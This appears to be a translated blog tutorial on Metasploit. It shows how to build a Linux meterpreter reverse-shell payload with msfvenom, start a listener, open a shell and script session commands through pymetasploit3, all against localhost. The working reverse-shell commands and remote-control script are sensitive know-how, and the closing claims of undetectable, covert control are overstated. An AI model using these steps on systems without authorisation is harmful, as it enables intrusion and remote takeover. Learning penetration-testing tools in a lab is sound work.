1. About metasploit
Metasploit is an open source penetration testing framework developed and maintained by Rapid7. It provides a powerful set of tools and resources for evaluating and testing the security of computer systems. The goal of Metasploit is to help security professionals discover and exploit vulnerabilities in systems in order to improve system security.
Background on Metasploit:
Originally created by HD Moore in 2003, Metasploit started out as an open-source security toolset for simplifying network penetration testing and exploits. It started out as a command-line tool, but over time Metasploit evolved into a powerful and easy-to-use penetration testing framework. Its open-source nature allows the global security community to contribute to and improve Metasploit, making it one of the most popular penetration testing tools today.
The main functions of Metasploit:
1. Vulnerability scanning and assessment: Metasploit provides a powerful vulnerability scanning engine, which can be used to automatically scan for vulnerabilities in the target system. It can scan for common vulnerabilities, such as SQL injection, XSS, etc., and generate detailed reports to help security professionals evaluate the security of the system.
2. Exploitation: Metasploit provides an extensive set of exploit modules for exploiting known system vulnerabilities. These modules can be used to gain access to the target system, execute commands, extract sensitive information, and more.
3. Social Engineering: Metasploit also provides some social engineering modules for testing a person's skills in phishing, malware distribution, etc. These modules help security professionals assess employees' resilience to social engineering attacks.
4. Remote control: An important function of Metasploit is the ability to provide remote control. By establishing a connection to a target system, security professionals can remotely execute commands, upload and download files, take screenshots, and more.
5. Modular architecture: Metasploit's architecture is modular, which allows users to customize and extend its functionality as needed. Users can write their own modules, or obtain modules shared by other users from the Metasploit community.
6. Automation and integration: Metasploit can be integrated with other security tools and platforms to automate penetration testing and vulnerability management. It can be integrated with tools such as Nessus and Nmap to provide a more comprehensive penetration testing solution.
In summary:
Metasploit is a powerful penetration testing framework designed to help security professionals evaluate and improve the security of their systems. It provides a series of functions such as vulnerability scanning, vulnerability exploitation, social engineering, remote control, etc., enabling security professionals to better discover and exploit vulnerabilities in the system. The open-source nature and modular architecture of Metasploit make it an active security community where users can contribute and improve Metasploit, keeping it updated and adaptable to the ever-changing threat environment.
If you want to use metasploit, the easiest way is to use linux-kali. For the installation method, please refer to the blog.
2. Generate a rebound shell program at the controlled end, and the master control end sends remote control commands
2.1 Generate a rebound shell program
Use msfvenom on the kali machine to make a rebound shell program as the controlled end, and the rebound shell program will actively connect to the open port of the master console.
Here I set the ip of the main control terminal as the local ip 127.0.0.1, and the port of the main control terminal is 4444. Because the controlled end is executed on the Kali local machine, the payload selects "linux/x64/meterpreter/reverse_tcp". There are many types of payloads, you can search for "reverse_tcp" on msfconsole, you can find a large number of payloads, whether it is windows or android, you can find the payload that suits your controlled terminal operating environment.
┌──(root㉿kali)-[/home/kali/reverse_tcp_test]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o client_x64.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: client_x64.bin2.2 Configure the console and execute remote control commands
Open metasploit by typing "msfconsole" from the kali command line.
Use the following command to configure the host:
use payload linux/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
set ExitOnSession false
After the configuration is complete use
exploit -j -zOpen the listening port of the master control.
Add execution permission to client_x64.bin and execute it. You can see that the active end has a "Meterpreter session" (127.0.0.1:4444 -> 127.0.0.1:45906).
Use sessions -l after "ctrl +c", you can see the session id established at this time, and you can enter the rebound shell through "session -i id". You can execute some commands in the reverse shell, but you can easily find that the commands that can be executed are very limited. (ls can be executed, but whoami, echo, etc. cannot be executed)
You need to enter the shell to enhance your abilities. In Meterpreter, "meterpreter > shell" means switching from a Meterpreter session to the interactive shell of the target system. This means that you can execute commands and actions on the target system as if they were in the local system's command line interface. This is an important step as it allows you to directly interact with the target system and perform more advanced tasks and operations.
OK, now you can successfully control the controlled end. If the program authority of the controlled end is higher, you can do more things.
The screenshot of the whole process execution is as follows:
3. Use the API of the Metasploit framework to realize automatic custom sending control commands
3.1 Pymetasploit3
Pymetasploit3 is an API for the Metasploit framework written in Python. It provides the ability to interact with the Metasploit framework, enabling users to use various functions and tools of Metasploit programmatically. Here are the main uses of Pymetasploit3:
1. Penetration testing automation: Pymetasploit3 allows users to automate penetration testing tasks by writing Python scripts. Users can use Pymetasploit3 API to perform various penetration testing operations, such as scanning for vulnerabilities, exploiting vulnerabilities, gaining access to the target system, etc. This enables penetration testers to perform repetitive tasks more efficiently and integrate the Metasploit framework into their workflow.
2. Custom module development: Pymetasploit3 provides a set of APIs that enable users to write their own Metasploit modules. Users can use Pymetasploit3 API to develop customized modules based on their own needs and characteristics of the target system to achieve more accurate and effective penetration testing. This enables users to extend and customize the functionality of the Metasploit framework according to specific scenarios and needs.
3. Data analysis and report generation: Pymetasploit3 provides functions for accessing and processing data generated by the Metasploit framework. Users can use the Pymetasploit3 API to obtain the result data during the penetration testing process, such as scanning reports, vulnerability information, etc. This enables users to analyze and interpret penetration testing results and generate detailed reports to communicate test results and recommendations to stakeholders.
4. Vulnerability management and tracking: Pymetasploit3 allows users to manage and track vulnerabilities programmatically. Users can use the Pymetasploit3 API to obtain vulnerability information, update vulnerability status, track vulnerability repair progress, etc. This enables users to better organize and manage vulnerabilities found in penetration testing, improving the efficiency and accuracy of vulnerability remediation.
In summary:
Pymetasploit3 is an API for the Metasploit framework written in Python that provides functionality to interact with the Metasploit framework. Its primary uses include penetration testing automation, custom module development, data analysis and report generation, and vulnerability management and tracking. Using Pymetasploit3, users can programmatically perform penetration testing tasks more efficiently, customize and extend the functions of the Metasploit framework, and analyze and report test results.
3.2 Some programs using Pymetasploit3
3.2.1 About RPC
Need to enter before using
load msgrpcwill see the output
msf6 payload(linux/x64/meterpr
eter/reverse_tcp) > load msgrpc
[*] MSGRPC Service: 127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: DCcxOGeW
[*] Successfully loaded plugin: msgrpc
The RPC password "DCcxOGeW" is generated here, which will be used later. Of course, the password here can also be configured by yourself.
Maybe you want to ask, what can "load msgrpc" do? Its role is to load the Metasploit RPC (Remote Procedure Call) service for remote communication and control with the Metasploit framework.
Specifically, the "load msgrpc" command starts an RPC service that allows users to connect to the Metasploit framework over the network and interact using the API. Once the RPC service is started, users can write scripts in various programming languages (such as Python, Ruby, etc.), communicate with the Metasploit framework through the API, and perform various penetration testing tasks and operations.
By loading msgrpc, users can realize the following functions:
1. Remote control: Users can connect to the Metasploit framework through the network to perform various penetration testing tasks from a remote location, such as scanning for vulnerabilities, exploiting vulnerabilities, gaining access rights, etc. This is very useful for scenarios where penetration testing tasks need to be performed remotely, such as performing penetration testing tasks on a remote server.
2. Automation and integration: Through the RPC service, users can write scripts to automate penetration testing tasks and integrate the Metasploit framework into their workflow. Users can use various programming languages and tools to interact with the Metasploit framework, enabling more efficient and customized penetration testing.
3. Distributed penetration testing: By starting multiple RPC services, users can implement distributed penetration testing. This means that users can perform penetration testing tasks on multiple machines at the same time, thereby improving the efficiency and speed of testing.
3.2.2 python program (just a reference program)
You can write the following python file to connect to the Metasploit framework with the help of the Metasploit RPC (Remote Procedure Call) service:
# -*- coding:utf-8 -*-
from pymetasploit3.msfrpc import MsfRpcClient
#参数需要参考msgrpc的输出
client = MsfRpcClient(password='DCcxOGeW', server='127.0.0.1', port=55552)
#session id需要通过“sessions -l”来获得,一般是1
session=client.sessions.session("1")
if session:
print("Meterpreter会话已建立")
shell = session.start_shell()
if shell:
print("交互式Shell已启动")
while True:
command = input("请输入命令:")
if command.lower() == "exit":
break
else:
print("您输入的命令是:",command)
session.write(command + "\n")
output = session.read()
print(output)
else:
print("无法启动交互式Shell")
I also saw that there are many other ways of writing on github, and I will list a few for reference.
GitHub - Coalfire-Research/pymetasploit3 at 0afc16bc04016187de6786dbb93c94874b5e3101
4. Finally
Metasploit's method of generating a reverse shell for remote control has the following advantages:
1. Highly customizable: The Metasploit framework provides a wealth of modules and tools that can generate customized rebound shells according to specific needs. Users can choose the corresponding modules and configurations according to the characteristics and actual conditions of the target system, so as to achieve more precise and effective remote control.
2. Multi-platform support: Metasploit framework supports multiple operating systems and platforms, including Windows, Linux, Mac, etc. This means that users can use Metasploit to generate reverse shells suitable for different operating systems to achieve cross-platform remote control.
3. Powerful ability to exploit vulnerabilities: Metasploit framework integrates a large number of exploit modules, which can use known vulnerabilities to gain access to the target system. By generating a reverse shell, users can use these exploit modules to achieve remote control, thereby performing various operations on the target system, such as executing commands, uploading and downloading files, and obtaining sensitive information.
4. No prior installation of malware required: Methods of spawning reverse shells usually do not require any prior installation of malware on the target system. This means that by exploiting known vulnerabilities, users can directly execute code on the target system to achieve remote control without leaving traces on the target system that can be detected and removed.
5. Highly flexible and extensible: Metasploit framework's reverse shell generation method can be customized and extended according to specific needs. Users can use the API and programming language provided by the Metasploit framework to write custom modules and scripts to achieve more complex and specific remote control functions.
Therefore, Metasploit's method of generating reverse shells for remote control has the advantages of high customization, multi-platform support, powerful vulnerability exploitation capabilities, no need to install malware in advance, and high flexibility and scalability. This enables users to achieve precise, effective and covert remote control according to specific needs and characteristics of the target system.